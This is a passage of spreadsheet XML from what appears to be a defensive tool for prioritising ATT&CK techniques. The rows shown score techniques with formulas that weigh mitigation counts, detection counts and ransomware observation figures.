        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I128">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J128">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K128">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L128">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M128" s="25">
        <v>0</v>
      </c>
      <c r="N128" s="51">
        <v>0</v>
      </c>
      <c r="O128" s="51">
        <v>0</v>
      </c>
      <c r="P128" s="51">
        <v>0</v>
      </c>
      <c r="Q128" s="51">
        <v>0</v>
      </c>
      <c r="R128" s="52" t="s">
        <v>599</v>
      </c>
      <c r="S128" s="51">
        <v>17</v>
      </c>
      <c r="T128" s="52" t="s">
        <v>600</v>
      </c>
      <c r="U128" s="51">
        <v>25</v>
      </c>
      <c r="V128" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="W128">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>42</v>
      </c>
      <c r="X128">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="Y128">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="Z128">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA128">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB128">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC128" s="29" t="s">
        <v>601</v>
      </c>
      <c r="AD128" s="25" t="str" cm="1">
        <f t="array" ref="AD128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC128)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE128" s="25">
        <f>IF(AD128="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF128" s="25" t="str" cm="1">
        <f t="array" ref="AF128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC128)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG128" s="25">
        <f>IF(AF128="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH128" s="25" t="str" cm="1">
        <f t="array" ref="AH128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC128)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI128" s="25">
        <f>IF(AH128="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ128" s="25" t="str" cm="1">
        <f t="array" ref="AJ128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC128)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK128" s="25">
        <f>IF(AJ128="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL128" s="25" t="str" cm="1">
        <f t="array" ref="AL128">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC128)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM128" s="25">
        <f>IF(AL128="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN128" s="60">
        <v>0</v>
      </c>
      <c r="AO128" s="51">
        <v>0</v>
      </c>
      <c r="AP128" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9800000000000001E-2</v>
      </c>
      <c r="AQ128" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.23266666666666666</v>
      </c>
      <c r="AR128" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.23266666666666666</v>
      </c>
      <c r="AS128" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT128" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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29" spans="1:47" ht="48">
      <c r="A129" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.3966666666666686E-2</v>
      </c>
      <c r="B129" s="25">
        <f>SUM(H129,M129,V129)*(1+SUM(AE129,AG129,AI129,AK129,AM129))</f>
        <v>0.63966666666666683</v>
      </c>
      <c r="C129" s="25" t="s">
        <v>602</v>
      </c>
      <c r="D129" s="25" t="s">
        <v>597</v>
      </c>
      <c r="E129" s="25" t="s">
        <v>603</v>
      </c>
      <c r="F129" s="51">
        <v>1</v>
      </c>
      <c r="G129" s="51">
        <v>1</v>
      </c>
      <c r="H129" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I129">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J129">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K129">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L129">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M129" s="25">
        <v>0</v>
      </c>
      <c r="N129" s="51">
        <v>0</v>
      </c>
      <c r="O129" s="51">
        <v>0</v>
      </c>
      <c r="P129" s="51">
        <v>0</v>
      </c>
      <c r="Q129" s="51">
        <v>0</v>
      </c>
      <c r="R129" s="52" t="s">
        <v>599</v>
      </c>
      <c r="S129" s="51">
        <v>17</v>
      </c>
      <c r="T129" s="52" t="s">
        <v>600</v>
      </c>
      <c r="U129" s="51">
        <v>23</v>
      </c>
      <c r="V129" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.38095238095238099</v>
      </c>
      <c r="W129">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>40</v>
      </c>
      <c r="X129">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="Y129">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="Z129">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA129">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB129">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC129" s="29" t="s">
        <v>604</v>
      </c>
      <c r="AD129" s="25" t="str" cm="1">
        <f t="array" ref="AD129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC129)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE129" s="25">
        <f>IF(AD129="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF129" s="25" t="str" cm="1">
        <f t="array" ref="AF129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC129)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG129" s="25">
        <f>IF(AF129="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH129" s="25" t="str" cm="1">
        <f t="array" ref="AH129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC129)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI129" s="25">
        <f>IF(AH129="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ129" s="25" t="str" cm="1">
        <f t="array" ref="AJ129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC129)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK129" s="25">
        <f>IF(AJ129="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL129" s="25" t="str" cm="1">
        <f t="array" ref="AL129">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC129)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM129" s="25">
        <f>IF(AL129="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN129" s="52">
        <v>0</v>
      </c>
      <c r="AO129" s="51">
        <v>0</v>
      </c>
      <c r="AP129" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.3966666666666686E-2</v>
      </c>
      <c r="AQ129" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.21322222222222229</v>
      </c>
      <c r="AR129" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.21322222222222229</v>
      </c>
      <c r="AS129" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT129" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU12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30" spans="1:47">
      <c r="A130" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1628095238095237E-2</v>
      </c>
      <c r="B130" s="25">
        <f>SUM(H130,M130,V130)*(1+SUM(AE130,AG130,AI130,AK130,AM130))</f>
        <v>0.5162809523809524</v>
      </c>
      <c r="C130" s="25" t="s">
        <v>605</v>
      </c>
      <c r="D130" s="25" t="s">
        <v>597</v>
      </c>
      <c r="E130" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F130" s="51">
        <v>1</v>
      </c>
      <c r="G130" s="51">
        <v>0</v>
      </c>
      <c r="H130" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I130">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J130">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K130">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L130">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M130" s="25">
        <v>0</v>
      </c>
      <c r="N130" s="51">
        <v>0</v>
      </c>
      <c r="O130" s="51">
        <v>0</v>
      </c>
      <c r="P130" s="51">
        <v>0</v>
      </c>
      <c r="Q130" s="51">
        <v>0</v>
      </c>
      <c r="R130" s="52" t="s">
        <v>606</v>
      </c>
      <c r="S130" s="51">
        <v>17</v>
      </c>
      <c r="T130" s="52" t="s">
        <v>600</v>
      </c>
      <c r="U130" s="51">
        <v>23</v>
      </c>
      <c r="V130" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.38095238095238099</v>
      </c>
      <c r="W130">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>40</v>
      </c>
      <c r="X130">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="Y130">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="Z130">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA130">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB130">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC130" s="29" t="s">
        <v>607</v>
      </c>
      <c r="AD130" s="25" t="str" cm="1">
        <f t="array" ref="AD130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC130)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE130" s="25">
        <f>IF(AD130="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF130" s="25" t="str" cm="1">
        <f t="array" ref="AF130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG130" s="25">
        <f>IF(AF130="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH130" s="25" t="str" cm="1">
        <f t="array" ref="AH130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI130" s="25">
        <f>IF(AH130="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ130" s="25" t="str" cm="1">
        <f t="array" ref="AJ130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK130" s="25">
        <f>IF(AJ130="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL130" s="25" t="str" cm="1">
        <f t="array" ref="AL130">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC130)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM130" s="25">
        <f>IF(AL130="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN130" s="60">
        <v>0</v>
      </c>
      <c r="AO130" s="51">
        <v>0</v>
      </c>
      <c r="AP130" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1628095238095237E-2</v>
      </c>
      <c r="AQ130" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1720936507936508</v>
      </c>
      <c r="AR130" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1720936507936508</v>
      </c>
      <c r="AS130" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT130" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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31" spans="1:47" ht="63.95">
      <c r="A131" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.3333333333333353E-2</v>
      </c>
      <c r="B131" s="25">
        <f>SUM(H131,M131,V131)*(1+SUM(AE131,AG131,AI131,AK131,AM131))</f>
        <v>0.63333333333333353</v>
      </c>
      <c r="C131" s="25" t="s">
        <v>608</v>
      </c>
      <c r="D131" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E131" s="25" t="s">
        <v>609</v>
      </c>
      <c r="F131" s="51">
        <v>1</v>
      </c>
      <c r="G131" s="51">
        <v>1</v>
      </c>
      <c r="H131" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I131">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J131">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K131">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L131">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M131" s="25">
        <v>0</v>
      </c>
      <c r="N131" s="51">
        <v>3</v>
      </c>
      <c r="O131" s="51">
        <v>6</v>
      </c>
      <c r="P131" s="51">
        <v>0</v>
      </c>
      <c r="Q131" s="51">
        <v>0</v>
      </c>
      <c r="R131" s="53" t="s">
        <v>610</v>
      </c>
      <c r="S131" s="51">
        <v>19</v>
      </c>
      <c r="T131" s="51" t="s">
        <v>611</v>
      </c>
      <c r="U131" s="51">
        <v>16</v>
      </c>
      <c r="V131" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.37619047619047624</v>
      </c>
      <c r="W131">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>35</v>
      </c>
      <c r="X131">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.63636363636363635</v>
      </c>
      <c r="Y131">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.63636363636363635</v>
      </c>
      <c r="Z131">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA131">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB131">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC131" s="29" t="s">
        <v>612</v>
      </c>
      <c r="AD131" s="25" t="str" cm="1">
        <f t="array" ref="AD131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC131)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE131" s="25">
        <f>IF(AD131="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF131" s="25" t="str" cm="1">
        <f t="array" ref="AF131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC131)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG131" s="25">
        <f>IF(AF131="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH131" s="25" t="str" cm="1">
        <f t="array" ref="AH131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC131)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI131" s="25">
        <f>IF(AH131="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ131" s="25" t="str" cm="1">
        <f t="array" ref="AJ131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC131)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK131" s="25">
        <f>IF(AJ131="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL131" s="25" t="str" cm="1">
        <f t="array" ref="AL131">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC131)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM131" s="25">
        <f>IF(AL131="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN131" s="58">
        <v>0</v>
      </c>
      <c r="AO131" s="51">
        <v>0</v>
      </c>
      <c r="AP131" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.3333333333333353E-2</v>
      </c>
      <c r="AQ131" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.21111111111111117</v>
      </c>
      <c r="AR131" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.21111111111111117</v>
      </c>
      <c r="AS131" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT131" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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32" spans="1:47" ht="32.1">
      <c r="A132" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.0380952380952381E-2</v>
      </c>
      <c r="B132" s="25">
        <f>SUM(H132,M132,V132)*(1+SUM(AE132,AG132,AI132,AK132,AM132))</f>
        <v>0.57047619047619047</v>
      </c>
      <c r="C132" s="25" t="s">
        <v>613</v>
      </c>
      <c r="D132" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E132" s="25" t="s">
        <v>614</v>
      </c>
      <c r="F132" s="51">
        <v>1</v>
      </c>
      <c r="G132" s="51">
        <v>1</v>
      </c>
      <c r="H132" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I132">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J132">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K132">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L132">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M132" s="25">
        <v>0</v>
      </c>
      <c r="N132" s="51">
        <v>5</v>
      </c>
      <c r="O132" s="51">
        <v>17</v>
      </c>
      <c r="P132" s="51">
        <v>1</v>
      </c>
      <c r="Q132" s="51">
        <v>6</v>
      </c>
      <c r="R132" s="52" t="s">
        <v>615</v>
      </c>
      <c r="S132" s="51">
        <v>11</v>
      </c>
      <c r="T132" s="51" t="s">
        <v>616</v>
      </c>
      <c r="U132" s="51">
        <v>14</v>
      </c>
      <c r="V132" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.37619047619047619</v>
      </c>
      <c r="W132">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X132">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y132">
